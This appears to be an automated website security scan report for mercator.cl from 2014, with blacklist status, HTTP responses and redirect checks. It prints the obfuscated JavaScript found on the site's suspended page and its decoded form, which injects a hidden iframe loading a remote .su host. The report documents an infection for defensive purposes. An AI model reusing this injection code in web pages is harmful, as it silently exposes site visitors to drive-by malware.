Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mercator.cl
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://mercator.cl/ | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Dec 2014 22:51:26 GMT Location: http://mercator.cl/cgi-sys/suspendedpage.cgi Server: Apache Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | clean |
http://mercator.cl/cgi-sys/suspendedpage.cgi | 200 OK Content-Length: 7397 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{q=document.createElement("u");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'o'+'m'+'Ch';f+='arC';}try{begbe=prototype;}catch(b43gds){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f.substr(11)+zz];n=[-2.75,-2.75,21.25,20.5,3,5,20,22.75,19.75,24.25,22.25,20.25,22.5,24,6.5,20.75,20.25,24,12.25,22,20.25,22.25,20.25,22.5,24,23.75,11.5,25.25,16,19.25,20.75,14.5,19.25,22.25,20.25,5,4.75,19.5,22.75,20,25.25,4.75,5.25,17.75,7,18.25,5.25,25.75,-1.75,-2.75,-2.75,-2.75,21.25,2 Decoded script: if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.s <iframe src='http://jahdivideoners.su/main.php?page=4d81d4c54d71b36c' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> Antivirus reports:
| ||
http://mercator.cl/test404page.js | HTTP/1.1 302 Found Connection: close Date: Mon, 22 Dec 2014 22:51:28 GMT Location: http://mercator.cl/cgi-sys/suspendedpage.cgi Server: Apache Content-Length: 228 Content-Type: text/html; charset=iso-8859-1 | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mercator.cl
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 22 Dec 2014 22:51:26 GMT
Location: http://mercator.cl/cgi-sys/suspendedpage.cgi
Server: Apache
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
...228 bytes of data.
GET / HTTP/1.1
Host: mercator.cl
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 22 Dec 2014 22:51:26 GMT
Location: http://mercator.cl/cgi-sys/suspendedpage.cgi
Server: Apache
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
...228 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mercator.cl
Referer: http://www.google.com/search?q=mercator.cl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mercator.cl
Referer: http://www.google.com/search?q=mercator.cl
Result:
The result is similar to the first query. There are no suspicious redirects found.